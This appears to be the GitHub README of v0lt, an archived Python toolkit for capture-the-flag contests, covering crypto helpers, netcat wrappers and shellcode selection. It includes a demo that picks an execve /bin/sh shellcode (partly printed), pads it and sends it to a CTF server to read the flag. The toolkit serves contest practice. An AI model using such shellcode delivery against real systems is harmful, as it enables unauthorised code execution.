Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
This repository was archived by the owner on Nov 1, 2018. It is now read-only.
/v0ltPublic archive

Security CTF Toolkit (Not maintained anymore)

NotificationsYou must be signed in to change notification settings

P1kachu/v0lt

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

v0lt

v0lt

Rawsec's CyberSecurity Inventory

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style.A lot of exercises were solved using bash scripts but Python may bemore flexible, that's why.Nothing to do with Gallopsled. It's a toy toolkit, with small butspecific utils only.

This project is not maintained anymore, since the utils themselves are small enough to work almost all the time without the need of maintaining anything. Feel free to submit PRs if you want however :)

Requirements and Installation

Dependencies:

  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:

# for v0lt installgit clone https://github.com/P1kachu/v0lt.gitcd v0lt[sudo] python3 setup.py install# sudo is required for potentially missing dependencies

Demo: Shellcodes

>>>fromv0ltimport*>>>nc=Netcat("archpichu.ddns.net",65102)Connectedtoport65102>>>print(nc.read())GIVEMESHELLCODZ>>>shellhack=ShellCrafter(4096,"bin","execve")>>>shellhack.get_shellcodes(shellhack.keywords)...<SNIPPED>...85:Linux/x86:setuid(0)&execve(/sbin/poweroff-f)-47bytes86:Linux/x86:execve (/bin/sh)-21Bytes87:Linux/x86:breakchrootexecve/bin/sh-80bytes88:Linux/x86:execve(/bin/sh,0,0)-21bytes...<SNIPPED>...Selection:86Yourchoice:http://shell-storm.org/shellcode/files/shellcode-752.phpShellcode:"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]">>>nc.shellcat(shellhack.shellcode)>>>nc.writeln(shellhack.pad())>>>exploit=nc.dialogue("cat flag",3)>>>print(exploit)AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:FilenametoolongP1kaCTF{sh3llc0de_1s_e4zY}

Implemented:

  • Crypto

    • Base64
    • Ceasar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (Dictionnary, custom word)
  • Shellcodes

    • Shellcode selection and download from Shell-storm repo
    • Shellcode formater
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support

    • Netcat
    • Telnet
  • Solving

    • Instruction Counting bruteforcer

And moreExamples are availablehere

About

Security CTF Toolkit (Not maintained anymore)

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages


[8]ページ先頭

©2009-2025 Movatter.jp